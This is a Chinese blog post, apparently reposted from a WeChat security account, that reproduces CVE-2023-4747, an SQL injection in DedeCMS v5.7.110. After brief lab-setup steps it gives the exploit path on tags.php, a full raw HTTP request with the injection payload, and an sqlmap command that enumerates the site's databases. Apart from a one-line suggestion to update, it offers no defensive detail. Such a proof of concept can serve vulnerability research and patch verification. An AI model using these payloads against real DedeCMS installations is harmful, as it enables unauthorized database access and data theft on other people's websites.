CVE-2023-4747漏洞（附EXP）

admin

102714
文章

87
评论

2023年9月7日17:29:20评论252 views字数 1387阅读4分37秒阅读模式

CVE-2023-4747漏洞（附EXP）

0x01 前言

DEDECMS 是一种可以综合管理网站上各种栏目的通用工具，DedeCMS 是目前国内最强大、最稳定的中小型门户网站建设解决方案之一，基于 PHP + MySQL 的技术开发，全部源码开放。在最新版本中存在SQL注入漏洞。

CVE-2023-4747漏洞（附EXP）

0x02 影响平台

DedeCMS v5.7.110

0x03 环境搭建

官网地址：https://www.dedecms.com/源码信息：https://github.com/dedecms/DedeCMS

下载源码，利用phpstudy搭建，将此目录作为网站根目录

CVE-2023-4747漏洞（附EXP）

访问install/index.php默认安装即可：

http://127.0.0.1/install/index.php

CVE-2023-4747漏洞（附EXP）

傻瓜式操作~

CVE-2023-4747漏洞（附EXP）

0x04 漏洞复现

环境搭建成功页面是这个酱紫

CVE-2023-4747漏洞（附EXP）

EXP：

/tags.php?QUERY_STRING=/alias/NDT'

CVE-2023-4747漏洞（附EXP）

GET /tags.php?QUERY_STRING=/alias/NDT%27+and+1=1# HTTP/1.1Host: 192.168.0.126Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=lkhe6hs7rr5ap9tbn6vng68784Connection: close

CVE-2023-4747漏洞（附EXP）

sqlmap一把梭：

python2 sqlmap.py -u "http://192.168.0.126/tags.php?QUERY_STRING=/alias/*" --dbs --batch

CVE-2023-4747漏洞（附EXP）

0x05 修复方案

建议及时更新至最新版本

CVE-2023-4747漏洞（附EXP） 往期回顾

1111

关注我

获得更多精彩
觉得内容不错，就点下“赞”和“在看”
如侵权请私聊公众号删文

原文始发于微信公众号（EchoSec）：CVE-2023-4747漏洞（附EXP）

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2023-4747漏洞（附EXP）

Hackerone 附件功能存在IDOR越权漏洞15000$

从环境搭建到内网渗透靶机

漏洞挖掘之某厂商OAuth2.0认证缺陷

大家喜欢看打击违法犯罪？新鲜的挖矿后台逻辑绕过放在这了

支付漏洞实现0元购

【開山安全笔记】WAF略知一二

R语言中的新漏洞可导致项目易受供应链攻击

从未授权使用破解软件到VenomRAT木马的应急响应

【红蓝/演练】-事前准备(6)之互联网风险收敛

如何利用关键 Ray 框架漏洞来入侵全球 AI 机器？

发表评论

在线咨询

微信